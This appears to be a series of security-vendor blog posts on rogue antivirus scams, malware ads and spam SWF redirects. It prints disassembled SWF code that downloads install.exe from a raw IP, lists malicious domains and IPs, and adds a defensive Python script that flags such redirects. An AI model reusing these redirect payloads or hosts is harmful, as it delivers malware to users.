Using Microsoft’s Log Parser

If you’re interested in forensics or log file analysis, Dave Kleiman has posted some useful information on using Microsoft’s Log Parser in forensics. As Dave says:

What is Log Parser? Microsoft’s Log Parser is perhaps the most underutilized and unknown tool for Microsoft OS’s. With this tool, retrieving vital information becomes a treat instead of a task. The tool is freely available from Microsoft.

You can download Log Parser here. Dave has a wealth of materials here on his website, and a specific presentation on using Log Parser here (rar file).

While Dave’s focus is on forensics, Log Parser is useful for all kinds of things, as it provides universal query access to log files, csv files, etc.

Alex Eckelberry

The audacity of Atrivo

From Brian Krebs today:

The portions of Atrivo most heavily used by RBN were Hostfresh — which provides routing for Atrivo through Hong Kong and China — and UkrTeleGroup (also known as Inhoster) out of Ukraine. These two networks remain core components of Atrivo’s operation, and recent data suggests the company’s reputation for supporting online criminals hasn’t diminished since the disappearance of the RBN last year. As of last December, Atrivo boasted the largest concentration of malicious activity of any hosting company, according to a report released by security intelligence firm iDefense.

“While Intercage has legitimate clients and professes intolerance for abuse, it continues to turn a blind eye to massive amounts of cyber crime,” iDefense analysts wrote. “Intercage Inc. previously operated as Atrivo Inc.; it was already infamous for abuse then and has not improved its reputation since changing names.”

Emil Kacperski, Atrivo’s founder, said he has been trying to clean up the company’s image.

“I work very hard to make sure that everything is kept at bay,” Kacperski said in an e-mail to Security Fix. “Unfortunately as you can understand being a dedicated server provider there isn’t a way for us to control the content on the servers. We can only respond to abuse reports and then proceed to shut down a server or take other action.”

Yeah. Right.

Alex Eckelberry

A lot of swf files…

Follow-up from my blog post yesterday on SWF files being used in spam: One researcher has shared with me a little over 800 SWF files on ImageShack, all pushing malware. I did a quick spot check and many of these are still live. I have been told that ImageShack has been notified. I hope they get this stuff down fast.


I did get a reader who was a bit confused about this, so just to make it clear: these SWF files contain a simple redirect that pops up a dialog to install a piece of malware from a different location. You actually have to click “Run” to execute the malware.

Alex Eckelberry

New rogue security product: Total Secure 2009

Total Secure 2009 is a new rogue security product from the IEDefender family.

The Trojan from the site Getneededsoftware. com installs a malicious BHO which is responsible for advertising the new rogue product:

O2 – BHO: RupTool – {F32B24F1-25FA-4A91-9F97-5272B3CE8FCA} – C:\WINDOWS\system32\xdaszt.dll

Total Secure 2009 Home page

IP: 91.203.92.98
Totalsecure2009. com

Typical fake/scare scan page

IP: 77.244.220.141
checksystem-online. com

Detection by existing antivirus engines on this one is really poor.

Additional sites associated with this scam:

Secure-order-box. com
Gettotalsec2008. com
Getdefender2009. com

Bharath M N

Folks, this is the new wave: SWF file redirects continue

In an earlier blog post, I mentioned that spammers are now using Shockwave Flash (SWF) files to avoid detection (similar in nature to the trick of using Google redirects, etc. in the past).

This continues. Here’s a current example:


This is a typical spam you see these days, pushing an install of a trojan that, if installed, typically downloads a rogue antispyware program.

Clicking on the link takes us to a SWF file hosted on ImageShack:

As you can see, it’s just junk text displaying. Its entire purpose is to push the download of that install.exe file (the trojan).

If we take a wee peek inside that SWF file, we see what’s going on:

movie ‘mal.swf’ compressed // flash 6, total frames: 3, frame rate: 50 fps, 978×580 px

// unknown tag 777 length 3

exportAssets
1 as ‘arial’
end // of exportAssets

exportAssets
2 as ‘line1’
end // of exportAssets

exportAssets
3 as ‘line2’
end // of exportAssets

exportAssets
4 as ‘line3’
end // of exportAssets

defineMovieClip 5 // total frames: 1

end // of defineMovieClip 5

exportAssets
5 as ‘TextBox’
end // of exportAssets

frame 1

constants ‘http://89 187 49 18/install exe’, ‘_self’
push ‘http://89 187 49 18/install exe’, ‘_self’
getURL2
end // of frame 1

frame 2
stop
end // of frame 2
end

So the malware authors have a nice place to redirect from — a file hosted on Imageshack.

Alex Eckelberry

XP Antivirus 2008 now with sploits, Google Adwords affected

I’ve blogged before about the problem of Google Adwords pushing XP Antivirus 2008. The situation is still ongoing.

However, it’s taken a turn for the worse, as these XP Antivirus pages are now pushing exploits to install malware on the user’s system.

This will also affect the many syndicators of Google Adwords.

[Screenshots: the Google search results, the ad as shown on Download.com, and the BestAV2009 page with the exploit code]

URLs involved in this particular event:

bestantivirus2009 com

iframe with exploits: huytegygle com/index.php <–script

There are a variety of exploits being used, including setslice and an AOL IM exploit. Unusually, an exploit framework is not being used. Fully patched systems will not be affected by these exploits.

The exploit attempts to install the following malicious file: huytegygle com/bin/ file.exe.

(Obviously, don’t visit these URLs unless you know what you’re doing, or you could be an unhappy camper.)

Alex Eckelberry

Recent news at Sunbelt

I’m duty-bound to report some recent news here at Sunbelt:

OEM deal:

Dakota Software Announces Technology Licensing Agreement with Sunbelt Software for Comprehensive Email Security Solution:
Innovative VIPRE Anti-malware Technology Is Core of New Email Protection Suite.

And a great new hire:

Sunbelt Software Appoints Director of International Sales: John-Erich Mantius To Drive WorldWide Sales Strategy

Alex Eckelberry

11 worst ideas in security. And finally, the truth comes out.

(Thanks to Larry Seltzer for this one)

What a wonderful list. It starts with this wonderful gem of truth and goes on down from there:

11. Security Industry and Market Analysts (I am become analyst, the destroyer of markets)

Those bastions of knowledge, defenders of the objective faith, and creators of 2-page, in-depth, market analysis reports. They don’t actually analyze security; they analyze the security market. They say cool things like “By the end of 2007, 75% of enterprises will be infected with undetected, financially motivated, targeted malware that evaded their traditional perimeter and host defenses.” and come up with amusing names and acronyms (did you know that NBA – Network Behavior Analysis – was at one time called NADS – Network Anomaly Detection System – you can imagine the fun Gartner could have had with an overview of the NADS market). I spent years as an analyst myself and I loved my time, but I will always regret that analysts never actually test, demo, or even interact with the technology they so confidently and assertively write about.

That last sentence: “I will always regret that analysts never actually test, demo, or even interact with the technology they so confidently and assertively write about.”

I suspect there are a lot of enterprise customers out there who don’t know that analysts, for the most part, never play with the products they recommend. They view vendor Powerpoints and talk to customers, vendors, and the like. Who wins? Probably the vendor with the best Powerpoint, the best relationship with the analyst, and the most willingness to pay for analyst research.

Whatever. More here.

Alex Eckelberry

Another Zango-lovin’ site

Softwareheadlines.com pushing Zango…

Hey, why not put up some content, then force users to install Zango to get content that they can otherwise freely obtain on The Internets? Awesome!

If you click “cancel”, you get to view the page, making that popup a complete lie (it also appears that when the dialog comes up asking if you’re sure you don’t want Zango, clicking “OK” to install Zango actually doesn’t do that — and you also get to view the site for free).

The text posted is, for all I know, scraped from other blogs (I don’t know that, but I wouldn’t be surprised). 

Alex Eckelberry

The continuing problem of malware being advertised in Google Adwords

Google continues to have a problem with malware being advertised in Google Adwords, in this case, for the trojan Antivirus XP 2008.

Examples:

[Screenshots of the Antivirus XP 2008 ads as served through Google Adwords]

An exacerbating part of the problem, of course, is that Google Adwords are massively syndicated to other sites, including heavy-hitters like CNET, all of whom may unknowingly push malware through these ads. A lot of people can get affected by this type of problem.

Alex Eckelberry

Isn’t this kind of click fraud?

Marketing uber-guru Seth Godin blogs:

Ads are the new online tip jar

“I never click on ads.”

It’s almost a badge of honor to say that. The subtext is, “I’m too smart/busy to waste my time doing that,” or perhaps, “I don’t want someone to sell my attention.”

But the real effect is that you’re starving great content.

I can say this because there are no ads here but,

If you like what you’re reading, click an ad to say thanks.

Pretty simple, but not an accepted online protocol, at least not yet.

If every time you read a blog post or bit of online content you enjoyed you clicked on an ad to say thanks, the economics of the web would change immediately. You don’t have to buy anything (though it’s fine if you do). You just have to honor the writer by giving them a click.

You still get what you pay for, even if you pay with attention.

Link here.

So advertisers will now have to adjust their economics to deal with meaningless clicks whenever someone wants to give a nod to a blog they like?

Not sure I like this idea.

Alex Eckelberry

Seen in the wild: Spam using swf files to avoid detection

Disassembled, the output is actually this:

movie ‘spammed.swf’ compressed // flash 6, total frames: 136, frame rate: 12 fps, 1×1 px

// unknown tag 88 length 78

frame 14
getURL hxxp://moyapodruzhka. com/?wmid=44&sid=44′ ”
end // of frame 14
end

(Simply a redirect to a Russian porn site.)
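Both disassembly listings on this page (the install.exe one in the “SWF file redirects continue” post above and the 1×1 pixel one here) share the same two tells: a getURL/getURL2 action that sends the viewer somewhere else, and, in the second case, a movie too small to be seen. The triage script below is an added example and is not code from the original post; it takes swfdump-style text of the kind shown above (the sample listings are constructed here, with URLs kept defanged, and are not the actual files) and reports where a movie redirects to, whether the target looks like an executable, and whether the movie is invisible.

```python
import re
from typing import Dict, List

# --- Constructed sample listings modelled on the two disassemblies quoted on
# the page. These are NOT the real files; hosts are defanged (hxxp, [.]) and
# the second URL is a placeholder under the reserved .invalid TLD.
MAL_LISTING = """\
movie 'mal.swf' compressed // flash 6, total frames: 3, frame rate: 50 fps, 978x580 px
exportAssets
5 as 'TextBox'
end // of exportAssets
frame 1
constants 'hxxp://89.187.49[.]18/install.exe', '_self'
push 'hxxp://89.187.49[.]18/install.exe', '_self'
getURL2
end // of frame 1
frame 2
stop
end // of frame 2
end
"""

SPAM_LISTING = """\
movie 'spammed.swf' compressed // flash 6, total frames: 136, frame rate: 12 fps, 1x1 px
frame 14
getURL hxxp://redirect-target.invalid/?wmid=44&sid=44 ''
end // of frame 14
end
"""

CLEAN_LISTING = """\
movie 'banner.swf' compressed // flash 6, total frames: 2, frame rate: 12 fps, 468x60 px
frame 1
stop
end // of frame 1
end
"""

HEADER_RE = re.compile(r"movie\s+'(?P<name>[^']+)'.*?(?P<w>\d+)\s*[x×]\s*(?P<h>\d+)\s*px")
FRAME_RE = re.compile(r"^frame\s+(?P<n>\d+)\s*$")
GETURL_RE = re.compile(r"^getURL\s+(?P<url>\S+)")  # Flash 4/5 style: URL inline
PUSH_RE = re.compile(r"^push\s+'(?P<url>[^']+)'")  # Flash 5+: push args, then getURL2
EXEC_RE = re.compile(r"\.(exe|scr|com|bat|cmd|msi|pif)(\W|$)", re.I)


def _normalise(line: str) -> str:
    # Listings pasted from the web usually carry curly quotes; fold them.
    return line.strip().replace("\u2018", "'").replace("\u2019", "'")


def analyze_listing(text: str) -> Dict:
    """Walk a swfdump-style listing and collect every redirect it performs."""
    name, width, height = "?", None, None
    frame = 0
    last_push = None
    redirects: List[Dict] = []
    for raw in text.splitlines():
        line = _normalise(raw)
        m = HEADER_RE.search(line)
        if m and width is None:
            name, width, height = m["name"], int(m["w"]), int(m["h"])
            continue
        m = FRAME_RE.match(line)
        if m:
            frame, last_push = int(m["n"]), None
            continue
        m = PUSH_RE.match(line)
        if m:
            last_push = m["url"]  # first pushed operand is the URL for getURL2
            continue
        if line.startswith("getURL2") and last_push:
            redirects.append({"frame": frame, "url": last_push, "action": "getURL2"})
            last_push = None
            continue
        m = GETURL_RE.match(line)
        if m:
            redirects.append({"frame": frame, "url": m["url"], "action": "getURL"})
    # A 1x1 (or 0x0) movie has no visible content; combined with a redirect
    # that is the spam pattern shown on the page.
    invisible = width is not None and width <= 1 and height <= 1
    if any(EXEC_RE.search(r["url"]) for r in redirects):
        verdict = "redirect-to-executable"
    elif redirects and invisible:
        verdict = "silent-redirect"
    elif redirects:
        verdict = "redirect"
    else:
        verdict = "clean"
    return {"name": name, "width": width, "height": height,
            "invisible": invisible, "redirects": redirects, "verdict": verdict}


if __name__ == "__main__":
    for listing in (MAL_LISTING, SPAM_LISTING, CLEAN_LISTING):
        r = analyze_listing(listing)
        print(f"{r['name']}: {r['verdict']} ({r['width']}x{r['height']} px)")
        for hit in r["redirects"]:
            print(f"  frame {hit['frame']}: {hit['action']} -> {hit['url']}")
```

Run over a directory of disassembled SWFs, the verdict field is enough to pull the redirectors out of a pile of uploaded images; the remaining redirect targets can then be handed to the hosting provider’s abuse desk, as the post describes for ImageShack.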

Alex Eckelberry

Continuing creativity in trojan distribution

We’ve seen the same trojan being sent to inboxes in all kinds of ways — and seemingly obsessively on the subject of Angelina Jolie. Minor shift: now they’re putting the fake codec window right in the spam.

Pushes video.avi.exe, a fake alert trojan which invariably installs Antivirus XP 2008 or some such rogue security program.

Alex Eckelberry